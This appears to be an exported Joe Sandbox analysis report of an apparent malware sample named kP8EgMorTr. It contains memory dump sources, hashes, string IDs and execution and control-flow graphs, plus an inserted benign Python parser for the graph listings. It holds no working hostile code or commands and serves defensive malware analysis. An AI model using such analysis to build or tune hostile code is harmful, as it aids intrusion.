                                                                                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction ID: 53863cd2ac7a7216f5f9812733733474d91a030eb2296c7bb39c6e764544ede3
                                                                                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction Fuzzy Hash: C3118B75504280DFDB15CF54D5C4B15FBB2FB84314F24C6AAD8494B696C33AD84ACBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction ID: 2850eba3c03e270794edb7d7bdc18945ce8cb2885eaf196c049dba91a71c6390
                                                                                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction Fuzzy Hash: 5611BB76905280DFDB15CF58D5C0B15FBA1FB84314F24C6A9D8494B696C33AD84ACB62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1382f9d433974e00a3e81204f187942f323afaa0c9ab66c54b5a2721bfa6fb8a
                                                                                            • Instruction ID: e449ecfc711629ff766e349134338edd2f435f04ca798f69ddb291f38488cb85
                                                                                            • Opcode Fuzzy Hash: 1382f9d433974e00a3e81204f187942f323afaa0c9ab66c54b5a2721bfa6fb8a
                                                                                            • Instruction Fuzzy Hash: 4701F731405348AAE7206A35CD84776BBD9FF40324F24C519EF088F282C2389840CAB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4bb59adce40d23bf7c905e5a6d53ea032716345e95024941502c8d1ea7244505
                                                                                            • Instruction ID: 111036d8ac26c617334286ba6e5131b390ffb5cb40132215b2e4af7be6e3581e
                                                                                            • Opcode Fuzzy Hash: 4bb59adce40d23bf7c905e5a6d53ea032716345e95024941502c8d1ea7244505
                                                                                            • Instruction Fuzzy Hash: B7F0C232005384AEE7209A15C984B66FFD8EB90734F28C55AEE084F282C2799844CA71
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Teq$xbq
                                                                                            • API String ID: 0-1834090110
                                                                                            • Opcode ID: 008c907ee1add3c13bce75cd666702e61daa8de5bca3692fb41177efcbb1e75e
                                                                                            • Instruction ID: 7f51a04827e1d837d07e2548a336fb35261fcaad86c7d6e798e21112494df20e
                                                                                            • Opcode Fuzzy Hash: 008c907ee1add3c13bce75cd666702e61daa8de5bca3692fb41177efcbb1e75e
                                                                                            • Instruction Fuzzy Hash: 42B17575E006188FDB58DF6AD984ADDBBF2BF88301F14C0AAD509AB365DB305A85CF50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q
                                                                                            • API String ID: 0-1807707664
                                                                                            • Opcode ID: 5e194d323c784a1ac66df7b6e5038f35b0f322bb19bf78bb4b4ae6c71c2951b7
                                                                                            • Instruction ID: 1e45082a1767044642bea5cb6ef933e3a799cb96161ef2d1c1d4ec03832fd28a
                                                                                            • Opcode Fuzzy Hash: 5e194d323c784a1ac66df7b6e5038f35b0f322bb19bf78bb4b4ae6c71c2951b7
                                                                                            • Instruction Fuzzy Hash: 8661F770E016498FD718EF7BE94169EBBF3FB88301F14D53AD0089B269EB7859068B51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q
                                                                                            • API String ID: 0-1807707664
                                                                                            • Opcode ID: 2f3f9e25d9b75c5679dbe69d879cbe348058af2f3b60e0ceb0988eab63a14c3f
                                                                                            • Instruction ID: 1c76ef750b59f30d5435b46b2d19c5902c5793d8c7474c4cd9c960bc575faf3f
                                                                                            • Opcode Fuzzy Hash: 2f3f9e25d9b75c5679dbe69d879cbe348058af2f3b60e0ceb0988eab63a14c3f
                                                                                            • Instruction Fuzzy Hash: D8610670E016498FE718EF7BE94169EBBF2FBC8301F14C539D0089B269EB7859068B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f0fd69f64eb12f565f8851c010c661c76d6019c69254464065fb5c4908441ff9
                                                                                            • Instruction ID: 238e4be65499775640df4a6de9e0ca995bef630efcbc2e97966f80d160f12e60
                                                                                            • Opcode Fuzzy Hash: f0fd69f64eb12f565f8851c010c661c76d6019c69254464065fb5c4908441ff9
                                                                                            • Instruction Fuzzy Hash: 31A18E32E102098FCF05DFB5C8505AEB7B6FFC5301B1585BAE906AB261DB71E956CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6fea251607836a51f47e6a13f35625c01f4f3e411cd0d102dcd87afe8c792cd
                                                                                            • Instruction ID: 42ee4e755c59bab8d1e1e5616a6399a9998f68f268ee0a3461c5f95e5fb58602
                                                                                            • Opcode Fuzzy Hash: e6fea251607836a51f47e6a13f35625c01f4f3e411cd0d102dcd87afe8c792cd
                                                                                            • Instruction Fuzzy Hash: 27612374D04209CFEB54DFEAD840AEEBBB6FF89300F20912AD419A7295D7709942CF90

                                                                                            Execution Graph

                                                                                            Execution Coverage:11%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:14
                                                                                            Total number of Limit Nodes:3
                                                                                             execution_graph (node id: address [resolved API] -> successor node ids)
                                                                                             • 19515: 5e99ed8 -> 19516
                                                                                             • 19516: 5e99f05 -> 19518, 19520, 19521
                                                                                             • 19518: 5e9bde7 (no successors)
                                                                                             • 19519: 5e99590 LdrInitializeThunk -> 19520
                                                                                             • 19520: 5e9a20e -> 19518, 19519
                                                                                             • 19521: 5e99590 -> 19524
                                                                                             • 19522: 5e995a2 -> 19520
                                                                                             • 19523: 5e99cd1 LdrInitializeThunk -> 19522
                                                                                             • 19524: 5e99595 -> 19522, 19523
                                                                                             • 19525: 5e99b94 -> 19530
                                                                                             • 19527: 5e99ce9 (no successors)
                                                                                             • 19528: 5e99b8c LdrInitializeThunk -> 19527
                                                                                             • 19529: 5e99590 LdrInitializeThunk -> 19530
                                                                                             • 19530: 5e99a4b -> 19528, 19529

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                             control_flow_graph (block id: address range [call target] -> successor block ids)
                                                                                             • 148: 31cc468-31cc471 -> 149, 150
                                                                                             • 149: 31cc3f3 -> 151, 152
                                                                                             • 150: 31cc473-31cc498 -> 153, 154
                                                                                             • 151: 31cc3dd-31cc3fb -> 160, 161
                                                                                             • 152: 31cc3f4-31cc3fb -> 159, 160
                                                                                             • 153: 31cc49f-31cc4e7 -> 162
                                                                                             • 154: 31cc49a -> 153
                                                                                             • 159: 31cc3fc-31cc400 -> 163
                                                                                             • 160: 31cc413-31cc414 -> 148
                                                                                             • 161: 31cc3fd-31cc400 -> 163
                                                                                             • 162: 31cc4ef-31cc4fe call 31c41a0 -> 166
                                                                                             • 163: 31cc40a-31cc412 -> 160
                                                                                             • 166: 31cc503-31cc57c call 31c3cc0 -> 173, 174
                                                                                             • 173: 31cc57e -> 174
                                                                                             • 174: 31cc583-31cc5a4 call 31c5658 -> 176
                                                                                             • 176: 31cc5a9-31cc5b4 -> 177, 178
                                                                                             • 177: 31cc5bb-31cc5bf -> 179, 180
                                                                                             • 178: 31cc5b6 -> 177
                                                                                             • 179: 31cc5c4-31cc5cb -> 182, 183
                                                                                             • 180: 31cc5c1-31cc5c2 -> 181
                                                                                             • 181: 31cc5e3-31cc627 -> 187
                                                                                             • 182: 31cc5cd -> 183
                                                                                             • 183: 31cc5d2-31cc5e0 -> 181
                                                                                             • 187: 31cc68d-31cc6a4 -> 189, 190
                                                                                             • 189: 31cc629-31cc63f -> 194, 195
                                                                                             • 190: 31cc6a6-31cc6cb -> 196, 197
                                                                                             • 194: 31cc669 -> 200
                                                                                             • 195: 31cc641-31cc64d -> 198, 199
                                                                                             • 196: 31cc6cd-31cc6e2 -> 197
                                                                                             • 197: 31cc6e3 (no successors)
                                                                                             • 198: 31cc64f-31cc655 -> 201
                                                                                             • 199: 31cc657-31cc65d -> 201
                                                                                             • 200: 31cc66f-31cc68c -> 187
                                                                                             • 201: 31cc667 -> 200
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq$PHq$PHq
                                                                                            • API String ID: 0-376399332
                                                                                            • Opcode ID: 0a764eb85d1162da7f9a65b0366fc18e8d45f8033ae5219bc72fa03e2ce3ebf0
                                                                                            • Instruction ID: f8272a6c6e14dc5c3b718c2445eab74c68d6601bb279ca63bfdea30037b32bf6
                                                                                            • Opcode Fuzzy Hash: 0a764eb85d1162da7f9a65b0366fc18e8d45f8033ae5219bc72fa03e2ce3ebf0
                                                                                            • Instruction Fuzzy Hash: E491E674E10258CFEB14DFAAD984A9DBBF2BF98310F14806AE419AB355DB309D42CF50
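The Execution Graph and Control-flow Graph panels above are exported by the report as one flattened token stream: a decimal node id, a hex address or address range, an optional label (an API such as LdrInitializeThunk, or a call target such as `call 31c41a0`), and `src->dst` edges, all interleaved in discovery order. The parser below is an added example written for this page, not code from the report or from Joe Sandbox. It embeds, verbatim from this report, the process 0 execution graph at 5e99ed8 and the process 3 control-flow graph at 31cc468, recovers nodes and edges, and reports entry blocks, exit blocks, the nodes that resolve to a given API, and the back edges that mark loops. The names `parse_graph`, `Graph`, `ADDR_RE` and the two constants are the example's own.

```python
"""Parser for the flattened graph serialization Joe Sandbox exports for its
Execution Graph and Control-flow Graph panels (added example, not the report's
or Joe Sandbox's code).  Token stream as it survives HTML extraction:
    <graph_name> ( <id> <addr>[-<addr>] [<label words>] | <src>-><dst> )*
"""
import re
from dataclasses import dataclass, field

ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")  # hex address or range

# Both listings are copied verbatim from this report (process 0 execution
# graph at 5e99ed8, process 3 control-flow graph at 31cc468).
EXECUTION_GRAPH = """execution_graph 19515 5e99ed8 19516 5e99f05 19515->19516
19518 5e9bde7 19516->19518 19520 5e9a20e 19516->19520 19521 5e99590
19516->19521 19519 5e99590 LdrInitializeThunk 19519->19520 19520->19518
19520->19519 19524 5e99595 19521->19524 19522 5e995a2 19522->19520
19523 5e99cd1 LdrInitializeThunk 19523->19522 19524->19522 19524->19523
19525 5e99b94 19530 5e99a4b 19525->19530 19527 5e99ce9 19528 5e99b8c
LdrInitializeThunk 19528->19527 19529 5e99590 LdrInitializeThunk
19529->19530 19530->19528 19530->19529"""
CONTROL_FLOW_GRAPH = """control_flow_graph 148 31cc468-31cc471 149 31cc3f3 148->149
150 31cc473-31cc498 148->150 151 31cc3dd-31cc3fb 149->151 152 31cc3f4-31cc3fb
149->152 153 31cc49f-31cc4e7 150->153 154 31cc49a 150->154 160 31cc413-31cc414
151->160 161 31cc3fd-31cc400 151->161 159 31cc3fc-31cc400 152->159 152->160
162 31cc4ef-31cc4fe call 31c41a0 153->162 154->153 163 31cc40a-31cc412 159->163
160->148 161->163 166 31cc503-31cc57c call 31c3cc0 162->166 163->160 173 31cc57e
166->173 174 31cc583-31cc5a4 call 31c5658 166->174 173->174 176 31cc5a9-31cc5b4
174->176 177 31cc5bb-31cc5bf 176->177 178 31cc5b6 176->178 179 31cc5c4-31cc5cb
177->179 180 31cc5c1-31cc5c2 177->180 178->177 182 31cc5cd 179->182
183 31cc5d2-31cc5e0 179->183 181 31cc5e3-31cc627 180->181 187 31cc68d-31cc6a4
181->187 182->183 183->181 189 31cc629-31cc63f 187->189 190 31cc6a6-31cc6cb
187->190 194 31cc669 189->194 195 31cc641-31cc64d 189->195 196 31cc6cd-31cc6e2
190->196 197 31cc6e3 190->197 200 31cc66f-31cc68c 194->200 198 31cc64f-31cc655
195->198 199 31cc657-31cc65d 195->199 196->197 201 31cc667 198->201 199->201
200->187 201->200"""


@dataclass
class Graph:
    name: str
    nodes: dict = field(default_factory=dict)  # id -> (address, label)
    edges: list = field(default_factory=list)  # (src, dst) in report order

    def succ(self, n):
        return [d for s, d in self.edges if s == n]

    def roots(self):
        """Blocks nothing jumps to; empty when the entry block sits in a loop."""
        targets = {d for _, d in self.edges}
        return sorted(n for n in self.nodes if n not in targets)

    def sinks(self):
        return sorted(n for n in self.nodes if not self.succ(n))

    def labelled(self, needle):
        """Blocks whose label contains needle (an API name, or 'call')."""
        return sorted(n for n, (_, lbl) in self.nodes.items() if needle in lbl)

    def back_edges(self):
        """Edges closing a cycle (loop heads): DFS from roots, then from any
        block still unvisited, in report order."""
        colour = dict.fromkeys(self.nodes, 0)  # 0 new, 1 on stack, 2 done
        found = []

        def dfs(u):
            colour[u] = 1
            for v in self.succ(u):
                if colour.setdefault(v, 0) == 1:
                    found.append((u, v))
                elif colour[v] == 0:
                    dfs(v)
            colour[u] = 2

        for start in self.roots() + list(self.nodes):
            if colour[start] == 0:
                dfs(start)
        return found


def parse_graph(text):
    tokens = text.split()
    graph, i = Graph(name=tokens[0]), 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            graph.edges.append((int(src), int(dst)))
            i += 1
            continue
        if not tok.isdigit():
            raise ValueError(f"token {i}: expected node id or edge, got {tok!r}")
        if i + 1 == len(tokens):  # listing cut between an id and its address
            raise ValueError(f"node {tok}: address missing, listing truncated")
        node_id, addr = int(tok), tokens[i + 1]
        if not ADDR_RE.match(addr):
            raise ValueError(f"node {node_id}: bad address {addr!r}")
        i += 2
        label = []  # label words run until the next decimal id or edge token
        while i < len(tokens) and "->" not in tokens[i] and not tokens[i].isdigit():
            label.append(tokens[i])
            i += 1
        graph.nodes[node_id] = (addr, " ".join(label))
    return graph
```

On the execution graph this recovers the 14 nodes the panel header counts, two entry points (19515 and 19525), two exit nodes (19518 and 19527), four nodes resolving to LdrInitializeThunk, and the two loops 19519<->19520 and 19529<->19530 around those calls. On the control-flow graph it recovers 34 blocks and 46 edges, no entry block outside a loop (160 jumps back to 148), the single exit block 197, the three blocks carrying a `call` target, and the loop heads 148 and 187. A listing cut between a block id and its address raises ValueError instead of silently dropping the block.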
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq$4'q
                                                                                            • API String ID: 0-1336004174
                                                                                            • Opcode ID: 26379d7ab905d3f191995dd95647b66bf1662d6aad2a4ad565ce913ca9041861
                                                                                            • Instruction ID: a8f221c1a3348f84f62eb53a1c2757bc116a786c48d303282445a339aae18016
                                                                                            • Opcode Fuzzy Hash: 26379d7ab905d3f191995dd95647b66bf1662d6aad2a4ad565ce913ca9041861
                                                                                            • Instruction Fuzzy Hash: 5C826F71A10289DFCB16CFA8C984AAEBBF6FF9C310F158559E405DB2A1D731E981CB50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31c7118; basic blocks span 31c7118-31c75eb; calls 31c76f1 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: (oq$(oq
• API String ID: 0-1396055846
• Opcode ID: 8c9f5b36e4687d60ac049f1526cfe3af744021f6f2094cc320b4538b1c169c23
• Instruction ID: 9443415ece5f86b677e2c759519953e604b580e2cf70de6b9091f5ae8ca43315
• Opcode Fuzzy Hash: 8c9f5b36e4687d60ac049f1526cfe3af744021f6f2094cc320b4538b1c169c23
• Instruction Fuzzy Hash: 64F15D71A20259CFCB15CF69D884AADBBB6BF5C310F1980A9E845EB3A1D770E841CF50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31cc147; basic blocks span 31cc0cf-31cc6e3; calls 31c41a0, 31c3cc0, 31c5658 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: ccbef8fde0bc3134b3df78d8c7de135be23f690cc905b4a5cc87d8510c7348ea
• Instruction ID: 36db47ab3e6aef37e252c1bc41dbbb2d7b2ef7f25b36bb07c93af56e892eb6f3
• Opcode Fuzzy Hash: ccbef8fde0bc3134b3df78d8c7de135be23f690cc905b4a5cc87d8510c7348ea
• Instruction Fuzzy Hash: E2A1E675E10258CFDB14DFAAD984A9DBBF2BF99310F14806AE409AB361DB309D42CF51

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31c5362; basic blocks span 31c5362-31c55ec; calls 31c41a0, 31c3cc0, 31c5658 and 31c5649 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: 08df8d53e9cd06710c111cdda66db3e0c1cf6a6aaa638d11c266544fbcbcd849
• Instruction ID: 9dd387821921c200e14252e385d66267a4e9d5ec873e0374ffd310034d736aad
• Opcode Fuzzy Hash: 08df8d53e9cd06710c111cdda66db3e0c1cf6a6aaa638d11c266544fbcbcd849
• Instruction Fuzzy Hash: 9091D674E10258CFDB14CFAAD984A9DBBF2BF99310F14C06AD809AB365DB34A845CF51

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31cca08; basic blocks span 31cca08-31ccd70; calls 31c41a0, 31c3cc0, 31c5658 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: d2f7dea20e13a87a8975c2cfcf22f5d12acddfb6ee29a7b3b816e2eb7b2ebe4e
• Instruction ID: c7f5ae627966114b7f843b5a37bd53c0073be0faaa98307741ca4363558103cd
• Opcode Fuzzy Hash: d2f7dea20e13a87a8975c2cfcf22f5d12acddfb6ee29a7b3b816e2eb7b2ebe4e
• Instruction Fuzzy Hash: 7381B374E10258CFDB14DFAAD984A9DBBF2BF99310F148069E419AB365DB309D42CF50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31ccff8; basic blocks span 31ccff8-31cd273; calls 31c41a0, 31c3cc0, 31c5658 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: 6cf6dc18ba74556417c3dbaf5d3d9d9a63b93582129ad274042158889be010e8
• Instruction ID: 8d4ea55f2d1246716222ac1f5c733cae6548421f1fcf3a2650a050405881dee5
• Opcode Fuzzy Hash: 6cf6dc18ba74556417c3dbaf5d3d9d9a63b93582129ad274042158889be010e8
• Instruction Fuzzy Hash: 5081B374E00258CFEB14DFAAD984A9DBBF2BF98310F14C069E419AB365DB749981CF50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31cd2cb; basic blocks span 31cd2cb-31cd543; calls 31c41a0, 31c3cc0, 31c5658 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: 52e9004bf655fd24cb2a3341926b69dd4f3ea0249aea5ffd8bd3fb212799c317
• Instruction ID: e84f208325233bfc4144ca16ae150a8893cd47a932b3aab9c1aae3d759cdddf8
• Opcode Fuzzy Hash: 52e9004bf655fd24cb2a3341926b69dd4f3ea0249aea5ffd8bd3fb212799c317
• Instruction Fuzzy Hash: AE81B274E00258CFEB14DFAAD984A9DFBF2BF99310F148069E419AB365DB349981CF50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31cc738; basic blocks span 31cc738-31cc9b3; calls 31c41a0, 31c3cc0, 31c5658 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: 6b0a761f8910c0538a1f1d28c4fa5b10d6dc7763488beb9651b238813aae9ee7
• Instruction ID: d3300b05932f28ef5bfd4a47deb2ce4a758e431b135594cb3e30ae86f541366d
• Opcode Fuzzy Hash: 6b0a761f8910c0538a1f1d28c4fa5b10d6dc7763488beb9651b238813aae9ee7
• Instruction Fuzzy Hash: 4F819274E10258CFEB14DFAAD984A9DFBF2BF98310F14806AD419AB365DB349942CF50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 31cd599; basic blocks span 31cd599-31cd813; calls 31c41a0, 31c3cc0, 31c5658 (node and edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
Similarity
• API ID:
• String ID: PHq$PHq
• API String ID: 0-1274609152
• Opcode ID: a690460c4dc4865f0c2239af89af32960899b11cfd0e0872a0526f40c87c9d1c
• Instruction ID: e07c524455f78634aa8e73a0d6afd1b2a531fedeb18eda23b7518bad9a774296
• Opcode Fuzzy Hash: a690460c4dc4865f0c2239af89af32960899b11cfd0e0872a0526f40c87c9d1c
• Instruction Fuzzy Hash: 8981B274E00258CFEB14DFAAD984A9DBBF2BF98310F14C069E819AB365DB349941CF50

Control-flow Graph
• Legend: Executed / Not Executed
• Entry block 5e997b0; basic blocks span 5e997b0-5e99df8; calls 5e99590 and LdrInitializeThunk (node and edge listing of the rendered graph omitted)
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3703933664.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_5e90000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c2cec22b30bb8d690d5fab945dbeb245a67754d8fbbfdf459c292063a122eb0
                                                                                            • Instruction ID: 2ddd6384cb8a5f00264356bdb6e2e443333983961cd0c0da8a05e821526cf33a
                                                                                            • Opcode Fuzzy Hash: 5c2cec22b30bb8d690d5fab945dbeb245a67754d8fbbfdf459c292063a122eb0
                                                                                            • Instruction Fuzzy Hash: 66F1E674E00219CFDB28DFA9C984B9DFBB2BF48304F5481A9D848AB355DB749985CF50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq
                                                                                            • API String ID: 0-1999159160
                                                                                            • Opcode ID: e85303169ed3ecd724c972c9a3856a947e545ca1496be2da74e3fa2593ff28d6
                                                                                            • Instruction ID: 1e10d10f859186eacb19cc98474349d99d9b8753e0630091e1a6222736d4b119
                                                                                            • Opcode Fuzzy Hash: e85303169ed3ecd724c972c9a3856a947e545ca1496be2da74e3fa2593ff28d6
                                                                                            • Instruction Fuzzy Hash: 95127B70A102598FDB14DF69D854BAEBBB6BF98300F18856EE409AB394DF34DD41CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $q
                                                                                            • API String ID: 0-1301096350
                                                                                            • Opcode ID: eb6eb47d46d901dfc317dd24753f716e3e609ca20fcf7b379eae7702ebf9aa42
                                                                                            • Instruction ID: 59102bb5b2b946f2be9208bff9b3edea0e31c06426a16d0174ea88fe5fbac2bd
                                                                                            • Opcode Fuzzy Hash: eb6eb47d46d901dfc317dd24753f716e3e609ca20fcf7b379eae7702ebf9aa42
                                                                                            • Instruction Fuzzy Hash: 9791B434B18358CBDB5CEBB9946427E7BB3BFC8710B05852DE506E7388CE3588128796
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0dbbe399bf7ea018253aba7d5f4e9a8a2372626ce3f9a2ee252bbb87c2de268e
                                                                                            • Instruction ID: 3b563c43ecd418566c24c0f7f314bda05075349aa7c724b110b8ac9ec7711801
                                                                                            • Opcode Fuzzy Hash: 0dbbe399bf7ea018253aba7d5f4e9a8a2372626ce3f9a2ee252bbb87c2de268e
                                                                                            • Instruction Fuzzy Hash: A7C11936D242998BCFA5CF7888403EDFB71EB5D600F188D99C454AF251DB368A4BCB91
                                                                                            Memory Dump Source
